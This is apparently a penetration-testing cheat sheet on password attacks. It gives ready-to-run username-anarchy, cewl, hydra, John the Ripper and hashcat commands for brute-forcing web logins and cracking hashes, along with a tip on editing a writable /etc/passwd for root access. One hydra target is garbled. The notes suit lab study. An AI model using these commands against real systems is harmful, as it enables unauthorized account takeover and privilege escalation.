🔐Password Attacks

Username Custom Wordlist

Username list can be made with username-anarchy

ruby username-anarchy/username-anarchy -i username.txt -f flast,f.last,first.last,last.first

Bruteforcing WebApps

When a website needs to be bruteforced with login use cewl to make a wordlist:

cewl http://postfish.off/team.html -m 5 -w team.txt 

Then use it with hydra

Normal:

hydra -l user -P /usr/share/wordlists/rockyou.txt <o[> http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

Here Login failed. Invalid is the string it greps for to know the login is not successful.

fm_user is the parameter

Base64:

hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/:username=^USER64^&password=^PASS64^

JohnTheRipper

To crack a hash:

--wordlist to specify wordlist

john --format=sha256 hashes_to_crack.txt

Tool	Description
pdf2john	Converts PDF documents for John
ssh2john	Converts SSH private keys for John
mscash2john	Converts MS Cash hashes for John
keychain2john	Converts OS X keychain files for John
rar2john	Converts RAR archives for John
pfx2john	Converts PKCS#12 files for John
truecrypt_volume2john	Converts TrueCrypt volumes for John
keepass2john	Converts KeePass databases for John
vncpcap2john	Converts VNC PCAP files for John
putty2john	Converts PuTTY private keys for John
zip2john	Converts ZIP archives for John
hccap2john	Converts WPA/WPA2 handshake captures for John
office2john	Converts MS Office documents for John
wpa2john	Converts WPA/WPA2 handshakes for John

To mutate the password:

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

If /etc/passwd file is editable then delete the "x" in it

Algorithm Types

• $1$ – MD5

• $2a$ – Blowfish

• $2y$ – Eksblowfish

• $5$ – SHA-256

• $6$ – SHA-512

\